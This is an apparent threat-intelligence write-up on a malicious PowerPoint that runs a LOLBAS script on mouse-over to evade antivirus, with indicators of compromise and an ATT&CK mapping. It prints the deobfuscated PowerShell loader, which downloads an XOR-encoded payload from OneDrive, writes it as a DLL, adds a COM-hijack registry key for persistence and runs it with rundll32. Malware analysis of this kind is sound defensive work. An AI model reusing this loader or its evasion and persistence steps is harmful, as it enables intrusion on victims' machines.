New Evasion Technique Using Powerpoint

According to VirusTotal, A Powerpoint sample was first submitted to VT on 2022-02-02, and 0/60 detection rate since 2022-09-08.

The same file was submitted to MalwareBazaar on September 9, 2022. Most of the solutions marked the file as clean.

Virus Total Detection Rate

Infection Chain
Email Attachment ==> .ppt file ==> wscript.exe ==> powershell.exe ==> rundll32.exe

Infection Chain

In-depth Analysis

The malicious action was designed to be triggered when the user starts the presentation mode and moves the mouse. Then wcript.exe will execute SyncAppvPublishingServer.vbs (LOLBAS) to run powershell.exe.

.vbs:..\..\..\..\..\..\..\..\windows/System32::$index_allocation/SyncAppvPublishingServer.vbs” ;

Powerpoint Trigger Config for Mouse Over

The obfuscated code is below. Let’s deobfuscate the code.


$t=c:\users\malware\appdata\local\temp\local.lnk;
if([IO.File]::Exists(c:\users\malware\appdata\local\temp\local.lnk))
{
break;
};
[IO.File]::Create(c:\users\malware\appdata\local\temp\local.lnk,1,[io.FileOPtions]::DeleteOnClose);

$dllPath=$ENV:ALLUSERSPROFILE+'\lmapi2.dll';
if([IO.File]::Exists($dllPath)){break;
};


$u='https[:]//9b5uja[.]am[.]files[.]1drv[.]com/y4mpYJ245I931DUGr7BV-dwLD7SReTqFr1N7eQOKSH_u-g2G18Jd6i3SRqYqgugj3FA2JQQ7JqclvWH13Br3B5Ux-F6QcqADr-FowC_9PZi1Aj7uckcK8Uix_7ja1tF6C_8-5xYgm6zwjbXsrlEcTEenAyA8BzEaGPudutl1wMDkzVr6Wm-n8_qRmYejLgbNoQmPTUe3P5NKFFLRjeeU_JhvA/DSC0002.jpeg?download';
$f=(New-Object Net.WebClient).DownloadData($u);
if($f.Count -lt 10000){break;
};
$f=$f[4..$f.Count];
$x=24;
$f=$f|%
{
	$x=(29*$x+49)% 256; //233
	$_=($_ -bxor $x);
	$_
};
[IO.File]::WriteAllBytes(C:\ProgramData\lmapi2.dll,$f);
$k=[Convert]::ToChar(0x23);
$z= /c reg ADD HKCU\Software\Classes\CLSID\{2735412E-7F64-5B0F-8F00-5D77AFBE261E}\InProcServer32 /t REG_SZ /d C:\ProgramData\lmapi2.dll /ve /f /reg:64 && rundll32.exe C:\ProgramData\lmapi2.dll,#1;
cmd $z;

In-depth Analysis

1.Powershell.exe checks the existence of local.lnk in the user’s temp folder. If it exists then stop the execution. If it doesn’t exist create the file and delete it. It doesn’t make sense to us.

Powershell Part1

2. Powershell.exe checks the existence of lmapi2.dll in ProgramData. If it exists then stop the execution.

Powershell Part2

3. Powershell.exe checks a file named as DSC0002.jpeg from OneDrive. As of now, it is still reachable.

Powershell Part3

4. Powershell.exe applies XOR to DSC0002.jpeg and writes into C:\ProgramData\lmapi2.dll.

Powershell Part4

5.Powershell.exe adds a registry key that points to lmapi2.dll for persistency (https://pentestlab.blog/tag/inprocserver32/) then execute the ordinal #1 from lmapi2.dll using rundll32.exe

Powershell Part5

DOCGuard Report

https://app.docguard.io/d1bceccf5d2b900a6b601c612346fdb3fa5bb0e2faeefcac3f9c29dc1d74838d/results/dashboard

DOCGuard Report

IOCs

IOC Table Output of DOCGuard

MITRE ATT&CK MATRIX MAPPING

Mitre Attack Matrix Mapping

Samples Details

File Named1bceccf5d2b900a6b601c612346fdb3fa5 bb0e2faeefcac3f9c29dc1d74838d.ppt
File TypeLegacy PowerPoint File
SHA256d1bceccf5d2b900a6b601c612346fdb3fa5 bb0e2faeefcac3f9c29dc1d74838d
MD5c0060c0741833af67121390922c44f91
File Size0.7 MB
VerdictMalicious
DateSeptember 15th 2022, 1:21:51 am
Sample Details

IOCs

IOC TypeValue
URLhttps[:]//9b5uja[.]am[.]files.1drv.com/y4mpYJ245I931DUGr7BV-dwLD7SReTqFr1N7eQOKSH_u- g2G18Jd6i3SRqYqgugj3FA2JQQ7JqclvWH13Br3B5Ux-F6QcqADr- FowC_9PZi1Aj7uckcK8Uix_7ja1tF6C_8- 5xYgm6zwjbXsrlEcTEenAyA8BzEaGPudutl1wMDkzVr6Wm- n8_qRmYejLgbNoQmPTUe3P5NKFFLRjeeU_JhvA/DSC0002.jpeg?download
URLhttps://kdmzlw.am.files.1drv.com/y4mv4glUgvW9nl8z8GU71P- hPw0oRtve9QpZ0pEgwJN1q_TlGY5yl5Mvkrc5rUh0Uxxknlr- 1qymWyCbPrkKOFgL4CARScSn9UMhq3c5hSNOQsDOamYLmOfN61lUtQO10vxtn0I7QROJd OtQ42wDsaiACGR- 5ZrmYwt0SmZkphGWQpT2gOFrsUxjg8_7QT01VTABiGr3T6xpWrTmFT5yu4toQ/DSC0001.jpe g?download
SHA256 (PPT)d1bceccf5d2b900a6b601c612346fdb3fa5bb0e2faeefcac3f9c29dc1d74838d
SHA256 (DSC0002.jpeg)be180a7c43734b7125b2d5cea7edd0174811a58113b048f5fe687db52db47fe3
SHA256(IMAPI2.dll)efa5b49bdd086125b2b7d4058d09566f1db5f183c2a6332c597322f85107667a
SHA256 (DSC0001.jpeg)dcbc485f71a0e60920a99bcb8b57c56fc58fcf100707fcbdb8c05b56431374ca
IOC Table
Comments are closed.